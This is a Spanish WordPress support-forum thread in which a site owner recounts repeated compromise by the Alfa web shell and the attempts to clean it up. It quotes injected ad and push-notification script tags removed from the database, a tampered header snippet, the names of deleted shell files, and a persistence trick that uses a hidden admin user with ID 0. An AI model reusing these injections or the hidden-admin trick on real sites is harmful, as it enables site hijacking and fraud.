Soporte » Seguridad » Alfa Shell

  • Resuelto felinecrisis

    (@felinecrisis)


    Hola,

    Hoy estoy sufriendo ataques de shell, concretamente de Alfa Data Shell.
    Parece ser que se llaman Alfa Team.

    Me crea un usuario con privilegios admin y me han trasteado la pagina.

    He borrado el usuario, borrado los archivos y me siguen entrando.

    El problema es que tengo Sucuri y Wordfence y no detecta que algo vaya mal.

    Alguna solucion?

    • Este debate fue modificado hace 1 mes, 2 semanas por Jose Luis. Razón: Mover al foro adecuado
Viendo 6 respuestas - de la 1 a la 6 (de un total de 6)
  • Moderador Jose Luis

    (@jose64)

    Hola.

    Te dejo el enlace a la guía de seguridad de WordPress.org donde te indica cómo hacer un diagnóstico, también te dejo el enlace a la guía para limpiar un WordPress infectado/hackeado en español.

    Coméntanos los resultados y, por favor, recuerda cerrar el debate marcándolo como resuelto cuando así lo consideres, de esta forma nos ayudas a mantener el foro al día.

    Hola,

    He limpiado archivos y reemplazado los q han tenido modificacion con Wordfence.
    Actualizado todo, bloqueado los comentarios, eliminado manualmente archivos via FTP.

    Tambien he cambiado contraseñas y nombre de base de datos y usuario de base de datos, contraseña de FTP, y acceso a panel de control.

    Ademas he instalado hide login plugin, pero nada, esta madrugada ha vuelto a entrar.

    De momento estoy instalando quttera para escanear con otro scanner, los scanners online me dicen que el sitio esta bien.

    He contactado con Sucuri y que su plugin gratuito no da proteccion ni hace mucho, y que pague el plan de pago Pro y me solucionan el problema.

    Investigo un poco mas por mi cuenta, y si no hay resultado, tocara apoquinar.

    Actualizo.

    Tras limpiar varias veces y no habia manera de proteger de los ataques, he optado por Malcare, 99$ al año.

    Dejo aqui el reporte final.

    File Report

    DELETED
    1. alfa-index.php
    2. wp-content/ai1wm-backups/index.php
    3. wp-content/uploads/siteground-optimizer-assets/externals/06d6cf01a3974f71e0283c9cc94dfdde.js
    4. wp-content/uploads/siteground-optimizer-assets/siteground-optimizer-combined-js-aa6f6a1a1abe3880b8f6e0e9b296a484.js

    QUARANTINED
    1. wp-content.php

    Database Report

    Scripts Deleted from wp_options

    1. <script>(function(s,u,z,p){s.src=u,s.setAttribute(‘data-zone’,z),p.appendChild(s);})(document.createElement(‘script’),’https://iclickcdn.com/tag.min.js&#8217;,3440038,document.body||document.documentElement)</script>

    2. <script src=»https://propu.sh/pfe/current/tag.min.js?z=3440045″ data-cfasync=»false» async></script>

    3. <script type=»text/javascript» src=»//inpagepush.com/400/3440052″ data-cfasync=»false» async=»async»></script>

    Estoy mirando a ver si vuelve a suceder, actualizo el hilo mañana a ver que pasa.

    Actualizacion.

    Despues de que se haya borrado con Malcare de pago, ha vuelto a suceder.

    Esta vez ha pisoteado mi cuenta de admin con su contraseña, y en vez de utilizar header and footer injection, ha modificado directamente el header para que sea mas dificil de localizar y le quite los spams.

    Este es el codigo oculto.

    <script data-ad-client=»ca-pub-8556744503570466″ async src=»https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js»></script>
    <meta charset=»<?php bloginfo( ‘charset’ ); ?>»>
    <meta name=»viewport» content=»width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no»>
    <link rel=»profile» href=»http://gmpg.org/xfn/11″>
    <link rel=»pingback» href=»<?php bloginfo( ‘pingback_url’ ); ?>»>

    Lloro.

    Moderador Jose Luis

    (@jose64)

    Hola.

    Tienes que seguir la guía paso a paso, sin saltarte ninguno.

    Actualizo.

    He tirado para restaurar una copia del mes de septiembre, y volcar algunos datos de base de datos actual que tenia.

    Al hacer el volcado y comprobar en metadatas de usuarios, he visto que habia un usuario 0 con privilegios de admin.

    No aparece en el listado de admin en el panel porque va desde 1, y este al ser id 0, creo que no aparece.

    Ahi estaba la respuesta de como me pisoteaba un usuario de admin, por si fuera poco, no aparece tampoco en el intento de login de malcare.

    En fin, reinstalacion de todo con la copia y a llorar.

Viendo 6 respuestas - de la 1 a la 6 (de un total de 6)
  • Debes estar registrado para responder a este debate.